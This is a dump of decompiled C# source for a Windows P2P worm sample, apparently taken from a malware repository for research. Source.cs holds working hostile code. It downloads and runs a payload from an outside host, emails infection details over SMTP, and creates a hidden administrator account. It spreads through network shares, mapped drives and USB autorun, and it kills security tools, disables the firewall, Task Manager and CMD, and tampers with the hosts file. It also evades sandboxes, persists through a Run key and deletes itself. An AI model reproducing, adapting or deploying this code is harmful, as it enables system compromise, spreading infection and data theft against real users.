using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ApplicationBase
{
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: worm, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8EC03A9B-2208-4FEE-92A0-7A52F1587AD3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd/My/MyProject.cs
+108
View File
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: worm, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8EC03A9B-2208-4FEE-92A0-7A52F1587AD3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[HideModuleName]
[StandardModule]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd/P2P-Worm.MSIL.Small.u.csproj
+48
View File
@@ -0,0 +1,48 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{CAE30E3E-EF9A-48E5-A6CA-508E68529890}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>worm</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.DirectoryServices" />
<Reference Include="System.Management" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Source.cs" />
<Compile Include="msekn.cs" />
<Compile Include="s6RS9hUNMV.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd/P2P-Worm.MSIL.Small.u.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "worm", "P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd.csproj", "{CAE30E3E-EF9A-48E5-A6CA-508E68529890}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{CAE30E3E-EF9A-48E5-A6CA-508E68529890}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{CAE30E3E-EF9A-48E5-A6CA-508E68529890}.Debug|Any CPU.Build.0 = Debug|Any CPU
{CAE30E3E-EF9A-48E5-A6CA-508E68529890}.Release|Any CPU.ActiveCfg = Release|Any CPU
{CAE30E3E-EF9A-48E5-A6CA-508E68529890}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd/Source.cs
+974
View File
@@ -0,0 +1,974 @@
// Decompiled with JetBrains decompiler
// Type: Source
// Assembly: worm, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8EC03A9B-2208-4FEE-92A0-7A52F1587AD3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.VisualBasic.FileIO;
using Microsoft.Win32;
using My;
using System;
using System.Diagnostics;
using System.DirectoryServices;
using System.IO;
using System.Management;
using System.Net;
using System.Net.Mail;
using System.Runtime.CompilerServices;
using System.Windows.Forms;
[StandardModule]
internal sealed class Source
{
private static string hxea8 = Path.GetTempPath() + "\\yIjUsWbVePcXxK.exe";
private static string path = Path.GetTempPath();
private static string w7tu;
private static string[] qktto;
private static string nyr67 = "http://hfmixed.fileave.com/Newtest.exe";
private static string jicyn;
private static StreamWriter w58n9 = new StreamWriter(Source.path + "\\melt.bat");
private static string[] r2p3z;
private static string od3u = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles;
public static string urzsu = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
private static FileAttributes ql19j = FileAttributes.Hidden;
private static string bb6z = Interaction.Environ("AppData") + "\\yIjUsWbVePcXxK.exe";
private static RegistryKey vx6yi;
private static string p0702 = (string) Registry.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Universal", "Universal", (object) "Universal");
private static RegistryKey ss2wr = Registry.LocalMachine.OpenSubKey("Software", true);
private static RegistryKey n4md4 = Source.ss2wr.CreateSubKey("Universal");
private static DirectoryEntry tz97v = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer");
private static DirectoryEntry x5z0v = Source.tz97v.Children.Add("Universal", "user");
private static string c2cx = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList";
private static ManagementObjectSearcher zib26 = new ManagementObjectSearcher("select * from win32_share");
private static DirectoryEntry vzkmj;
private static string uv92s = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Map Network Drive MRU\\";
private static RegistryKey nw5vo = Registry.CurrentUser.OpenSubKey(Source.uv92s);
private static ManagementClass managementClass = new ManagementClass("Win32_Share");
private static ManagementBaseObject inParams = Source.managementClass.GetMethodParameters("Create");
private static ManagementBaseObject outParams;
[STAThread]
public static void Main()
{
label_0:
int num1;
int num2;
try
{
int num3 = 1;
byte num4 = 1;
label_1:
num3 = 2;
byte num5 = 1;
label_2:
num3 = 3;
byte num6 = 1;
label_3:
num3 = 4;
byte num7 = 0;
label_4:
num3 = 5;
byte num8 = 0;
label_5:
num3 = 6;
byte num9 = 0;
label_6:
num3 = 7;
byte num10 = 0;
label_7:
num3 = 8;
byte num11 = 0;
label_8:
num3 = 9;
byte num12 = 0;
label_9:
num3 = 10;
byte num13 = 1;
label_10:
num3 = 11;
byte num14 = 0;
label_11:
num3 = 12;
byte num15 = 0;
label_12:
num3 = 13;
byte num16 = 0;
label_13:
num3 = 14;
byte num17 = 0;
label_14:
num3 = 15;
byte num18 = 0;
label_15:
num3 = 16;
byte num19 = 0;
label_16:
num3 = 17;
byte num20 = 0;
label_17:
num3 = 18;
byte num21 = 0;
label_18:
num3 = 19;
byte num22 = 0;
label_19:
num3 = 20;
byte num23 = 0;
label_20:
num3 = 21;
if (num19 != (byte) 1)
goto label_22;
label_21:
num3 = 22;
Source.dud98();
label_22:
num3 = 24;
if (num20 != (byte) 1)
goto label_24;
label_23:
num3 = 25;
Source.jmyz();
label_24:
num3 = 27;
if (num8 != (byte) 1)
goto label_26;
label_25:
num3 = 28;
Source.dlf68();
label_26:
num3 = 30;
if (num4 != (byte) 1)
goto label_28;
label_27:
num3 = 31;
Source.pv781();
label_28:
num3 = 33;
if (num6 != (byte) 1)
goto label_31;
label_29:
ProjectData.ClearProjectError();
num1 = 1;
label_30:
num3 = 35;
msekn.xnqfi("yIjUsWbVePcXxK.exe");
label_31:
num3 = 37;
if (num13 != (byte) 1)
goto label_35;
label_32:
num3 = 38;
Source.yygwu();
label_33:
num3 = 39;
Source.zl7hc("C:\\Program Settings", "Program Settings");
label_34:
num3 = 40;
Source.rijf();
label_35:
num3 = 42;
if (num11 != (byte) 1)
goto label_37;
label_36:
num3 = 43;
Source.sfywm();
label_37:
num3 = 45;
if (num16 != (byte) 1)
goto label_39;
label_38:
num3 = 46;
Source.vgauy();
label_39:
num3 = 48;
if (num9 != (byte) 1)
goto label_41;
label_40:
num3 = 49;
Source.d5zuk();
label_41:
num3 = 51;
if (num18 != (byte) 1)
goto label_43;
label_42:
num3 = 52;
Source.tgzsf();
label_43:
num3 = 54;
if (num15 != (byte) 1)
goto label_45;
label_44:
num3 = 55;
Source.juef();
label_45:
num3 = 57;
if (num7 != (byte) 1)
goto label_47;
label_46:
num3 = 58;
Source.bo2y();
label_47:
num3 = 60;
if (num17 != (byte) 1)
goto label_49;
label_48:
num3 = 61;
Source.w6aak();
label_49:
num3 = 63;
if (num14 != (byte) 1)
goto label_51;
label_50:
num3 = 64;
Source.avuur();
label_51:
num3 = 66;
if (num21 != (byte) 1)
goto label_53;
label_52:
num3 = 67;
Source.uqd84();
label_53:
num3 = 69;
if (num22 != (byte) 1)
goto label_55;
label_54:
num3 = 70;
Source.lerbr();
label_55:
num3 = 72;
Source.fnl7s();
label_56:
num3 = 73;
Source.af9yy();
label_57:
num3 = 74;
Source.k7u00();
label_58:
num3 = 75;
if (num23 != (byte) 1)
goto label_60;
label_59:
num3 = 76;
Source.q0fr5();
label_60:
num3 = 78;
if (num12 != (byte) 1)
goto label_62;
label_61:
num3 = 79;
Source.w8cni();
label_62:
num3 = 81;
if (num5 != (byte) 1)
goto label_64;
label_63:
num3 = 82;
Source.s8u9n();
label_64:
num3 = 84;
if (num10 != (byte) 1)
goto label_72;
label_65:
num3 = 85;
Source.fmhx7();
goto label_72;
label_67:
num2 = num3;
switch (num1)
{
case 1:
int num24 = num2 + 1;
num2 = 0;
switch (num24)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_5;
case 7:
goto label_6;
case 8:
goto label_7;
case 9:
goto label_8;
case 10:
goto label_9;
case 11:
goto label_10;
case 12:
goto label_11;
case 13:
goto label_12;
case 14:
goto label_13;
case 15:
goto label_14;
case 16:
goto label_15;
case 17:
goto label_16;
case 18:
goto label_17;
case 19:
goto label_18;
case 20:
goto label_19;
case 21:
goto label_20;
case 22:
goto label_21;
case 23:
case 24:
goto label_22;
case 25:
goto label_23;
case 26:
case 27:
goto label_24;
case 28:
goto label_25;
case 29:
case 30:
goto label_26;
case 31:
goto label_27;
case 32:
case 33:
goto label_28;
case 34:
goto label_29;
case 35:
goto label_30;
case 36:
case 37:
goto label_31;
case 38:
goto label_32;
case 39:
goto label_33;
case 40:
goto label_34;
case 41:
case 42:
goto label_35;
case 43:
goto label_36;
case 44:
case 45:
goto label_37;
case 46:
goto label_38;
case 47:
case 48:
goto label_39;
case 49:
goto label_40;
case 50:
case 51:
goto label_41;
case 52:
goto label_42;
case 53:
case 54:
goto label_43;
case 55:
goto label_44;
case 56:
case 57:
goto label_45;
case 58:
goto label_46;
case 59:
case 60:
goto label_47;
case 61:
goto label_48;
case 62:
case 63:
goto label_49;
case 64:
goto label_50;
case 65:
case 66:
goto label_51;
case 67:
goto label_52;
case 68:
case 69:
goto label_53;
case 70:
goto label_54;
case 71:
case 72:
goto label_55;
case 73:
goto label_56;
case 74:
goto label_57;
case 75:
goto label_58;
case 76:
goto label_59;
case 77:
case 78:
goto label_60;
case 79:
goto label_61;
case 80:
case 81:
goto label_62;
case 82:
goto label_63;
case 83:
case 84:
goto label_64;
case 85:
goto label_65;
case 86:
case 87:
goto label_72;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_67;
}
throw ProjectData.CreateProjectError(-2146828237);
label_72:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
public static void fmhx7()
{
Source.wj9v5();
Source.it1gc();
Source.sjbxk();
Source.rd0w5();
Source.y4uzq();
Source.h5aar();
Source.obmte();
Source.j0mk();
ProjectData.EndApp();
}
private static void avuur()
{
try
{
StreamWriter streamWriter = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\drivers\\etc\\\\hosts");
streamWriter.Write("gF513jdmId otQJXuk1R8");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("tAeVbBzt4H fXcWCfgUwv");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("H0B5FHt3rV nkpH74JPKn");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("AvjYSZZcBA r6JM5CnAG5");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("iTzB32J9eB GEMm75NM7E");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("IJZ1uIjU9K QIHfKBhLDu");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("bLblRgjFUd il4ax9Nhry");
streamWriter.Write(Environment.NewLine);
streamWriter.Write("w9GYMsTWnO kOL45xDCo7");
streamWriter.Write(Environment.NewLine);
streamWriter.Dispose();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
private static void dlf68()
{
Interaction.Shell("sc stop wscsvc", AppWinStyle.Hide);
Interaction.Shell("sc stop SharedAccess", AppWinStyle.Hide);
}
private static void w8cni()
{
string end = new StreamReader(((HttpWebResponse) ((HttpWebRequest) WebRequest.Create("http://automation.whatismyip.com/n09230945.asp")).GetResponse()).GetResponseStream()).ReadToEnd();
string hostName = Dns.GetHostName();
new SmtpClient("smtp.gmail.com")
{
Port = 587,
Credentials = ((ICredentialsByHost) new NetworkCredential("emailherelolz", "passwordxd")),
EnableSsl = true
}.Send(new MailMessage()
{
From = new MailAddress("emailherelolz"),
To = {
"emailherelolz"
},
Subject = "New Infection!",
Body = "New Infection! The Info Can Be Found Below: " + hostName + " | " + end
});
}
private static void lerbr()
{
Source.an7n0();
Source.px1d9();
Source.hm05m();
}
private static void q0fr5()
{
Source.bw928();
Source.ixwtf();
Source.g49hb();
}
private static void h5aar() => Source.w58n9.Close();
private static void wj9v5() => Source.w58n9.WriteLine("@echo off");
private static void b2i7g() => Source.r2p3z = Directory.GetLogicalDrives();
private static void f6ceo() => s6RS9hUNMV.z4Fy2OIBQ3();
private static void rgt2d() => s6RS9hUNMV.lgVM02aECe();
private static void vgauy() => Interaction.Shell("REG add HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System /v DisableCMD /t REG_DWORD /d 1 /f", AppWinStyle.Hide);
private static void dz2n2() => s6RS9hUNMV.D9F7l2pHXw();
private static void y4uzq() => Source.w58n9.Flush();
private static void it1gc() => Source.w58n9.WriteLine("TASKKILL /F /T /IM " + Application.ProductName);
private static void juef()
{
RegistryKey subKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System");
subKey.SetValue("DisableTaskMgr", (object) 1);
subKey.Close();
}
private static void rd0w5() => Source.w58n9.WriteLine("del melt.bat");
private static void ixwtf() => System.IO.File.SetAttributes(Source.bb6z, Source.ql19j);
private static void r0ipq() => s6RS9hUNMV.tWEuPFDShv();
private static void tgzsf() => Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoRun /t REG_DWORD /d 1 /f", AppWinStyle.NormalFocus);
private static void s3v2n() => s6RS9hUNMV.HfwdgTHYEb();
private static void a33ew() => MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", "Hidden", (object) "0", RegistryValueKind.DWord);
private static void j0mk() => Interaction.Shell("melt.bat");
private static void hm05m() => Source.vx6yi.Close();
private static void px1d9() => Source.vx6yi.DeleteSubKey("MSCONFIG.EXE", true);
private static void lym4u() => Microsoft.VisualBasic.FileSystem.SetAttr(Source.jicyn + "HDDFile.com", FileAttribute.Hidden);
private static void af9yy() => MyProject.Computer.Network.DownloadFile(Source.nyr67, Source.hxea8);
private static void k0hiq() => Source.outParams = Source.managementClass.InvokeMethod("Create", Source.inParams, (InvokeMethodOptions) null);
private static void w6aak() => Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f", AppWinStyle.NormalFocus);
private static void g49hb() => MyProject.Computer.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("1" + Application.ProductName, (object) Source.bb6z);
private static void bw928() => System.IO.File.Copy(Application.ExecutablePath, Source.bb6z);
private static void fnl7s()
{
if (!System.IO.File.Exists(Path.GetTempPath() + "\\yIjUsWbVePcXxK.exe"))
return;
ProjectData.EndApp();
}
private static void qa0jm() => Registry.SetValue(Source.c2cx, "Universal", (object) 0, RegistryValueKind.DWord);
private static void fdzct() => Source.vzkmj.Invoke("Add", (object) Source.x5z0v.Path.ToString());
private static void e9m81() => Source.vzkmj = Source.tz97v.Children.Find("Administrators", "group");
private static void bi7mc() => Source.x5z0v.CommitChanges();
private static void ocfhh() => Source.x5z0v.Invoke("SetPassword", (object) "Universalwashere");
private static void fiyqy() => MyProject.Computer.Network.DownloadFile(Source.nyr67, Source.hxea8);
private static void cnzrb() => Microsoft.VisualBasic.FileSystem.SetAttr(Source.jicyn + "autorun.inf", FileAttribute.Hidden);
private static void mi3aq() => MyProject.Computer.FileSystem.WriteAllText(Source.jicyn + "autorun.inf", "[autorun]\r\nopen=" + Source.jicyn + "HDDFile.com\r\nshellexecute=" + Source.jicyn, true);
private static void ofy9k() => MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, Source.jicyn + "HDDFile.com", (UIOption) -1, UICancelOption.DoNothing);
private static void obmte() => Interaction.Shell(Application.StartupPath + "\\melt.bat", AppWinStyle.Hide);
private static void sjbxk() => Source.w58n9.WriteLine("del " + Strings.Replace(Application.ExecutablePath, Application.StartupPath + "\\", ""));
private static void k7u00() => Process.Start(Source.hxea8);
private static void an7n0() => Source.vx6yi = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths", true);
public static void sfywm()
{
Process[] processesByName = Process.GetProcessesByName("iptray");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
}
public static void uqd84()
{
Process[] processesByName = Process.GetProcessesByName("kQRbVmmhvigBONo");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
ProjectData.EndApp();
checked { ++index; }
}
}
public static void d5zuk()
{
Process[] processesByName = Process.GetProcessesByName("cfp");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
}
public static void jmyz()
{
Process[] processesByName = Process.GetProcessesByName("VBoxTray");
int index = 0;
while (index < processesByName.Length)
{
Process process = processesByName[index];
int num = (int) MessageBox.Show("This Program Has Known Compaitablility Issues In VirtualBox. Please Run It Normally. The Application Will Now Close. Thankyou.", "Error");
ProjectData.EndApp();
checked { ++index; }
}
}
public static void bo2y()
{
Process[] processesByName = Process.GetProcessesByName("SpybotSD");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
}
public static void dud98()
{
Process[] processesByName = Process.GetProcessesByName("SandboxieRpcSs");
int index = 0;
while (index < processesByName.Length)
{
Process process = processesByName[index];
int num = (int) MessageBox.Show("This Program Has Known Compaitablility Issues In Sandboxie. Please Run It Normally. The Application Will Now Close. Thankyou.", "Error");
ProjectData.EndApp();
checked { ++index; }
}
}
private static void pv781()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
Source.a33ew();
label_2:
num3 = 3;
Source.b2i7g();
label_3:
num3 = 4;
string[] r2p3z = Source.r2p3z;
int index = 0;
goto label_13;
label_5:
num3 = 5;
if (Source.od3u.Contains(Source.jicyn))
goto label_11;
label_6:
num3 = 7;
label_7:
num3 = 8;
Source.ofy9k();
label_8:
num3 = 9;
Source.mi3aq();
label_9:
num3 = 10;
Source.lym4u();
label_10:
num3 = 11;
Source.cnzrb();
label_11:
checked { ++index; }
label_12:
num3 = 13;
label_13:
if (index < r2p3z.Length)
{
Source.jicyn = r2p3z[index];
goto label_5;
}
else
goto label_20;
label_15:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_5;
case 6:
case 12:
goto label_11;
case 7:
goto label_6;
case 8:
goto label_7;
case 9:
goto label_8;
case 10:
goto label_9;
case 11:
goto label_10;
case 13:
goto label_12;
case 14:
goto label_20;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_15;
}
throw ProjectData.CreateProjectError(-2146828237);
label_20:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
public static void s8u9n()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
Source.rgt2d();
label_2:
num3 = 3;
Source.dz2n2();
label_3:
num3 = 4;
Source.f6ceo();
label_4:
num3 = 5;
Source.s3v2n();
label_5:
num3 = 6;
Source.r0ipq();
goto label_12;
label_7:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_5;
case 7:
goto label_12;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_7;
}
throw ProjectData.CreateProjectError(-2146828237);
label_12:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
public static bool qkoo()
{
if (Operators.CompareString(Source.p0702, "Universal", false) == 0)
return true;
Source.n4md4.SetValue("Universal", (object) Source.urzsu);
return false;
}
public static void yygwu()
{
try
{
Source.ocfhh();
Source.bi7mc();
Source.e9m81();
if (Source.vzkmj != null)
Source.fdzct();
try
{
Source.qa0jm();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static void rijf()
{
try
{
try
{
foreach (ManagementBaseObject managementBaseObject in Source.zib26.Get())
{
string str = Convert.ToString(RuntimeHelpers.GetObjectValue(managementBaseObject["Name"]));
if (!str.Contains("$"))
System.IO.File.Copy(Source.urzsu, "\\\\" + Environment.MachineName + "\\" + str + "\\j2eBE.exe", true);
}
}
finally
{
ManagementObjectCollection.ManagementObjectEnumerator objectEnumerator;
objectEnumerator?.Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
string[] valueNames = Source.nw5vo.GetValueNames();
int index = 0;
while (index < valueNames.Length)
{
string name = valueNames[index];
string str = Source.nw5vo.GetValue(name).ToString();
if (Operators.CompareString(name.ToLower(), "mrulist", false) != 0)
{
try
{
System.IO.File.Copy(Source.urzsu, str + "\\\\j2eBE.exe", true);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
checked { ++index; }
}
Source.nw5vo.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static void zl7hc(string piw25, string n0wpg)
{
try
{
Directory.CreateDirectory(piw25);
Source.inParams["Description"] = (object) n0wpg;
Source.inParams["Name"] = (object) n0wpg;
Source.inParams["Path"] = (object) Microsoft.VisualBasic.FileSystem.Dir();
Source.inParams["Type"] = (object) 0;
Source.k0hiq();
if (Conversions.ToUInteger(Source.outParams.Properties["ReturnValue"].Value) != 0U || !Directory.Exists(piw25))
return;
new DirectoryInfo(piw25).Attributes = FileAttributes.Hidden;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd/msekn.cs
+99
View File
@@ -0,0 +1,99 @@
// Decompiled with JetBrains decompiler
// Type: msekn
// Assembly: worm, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8EC03A9B-2208-4FEE-92A0-7A52F1587AD3
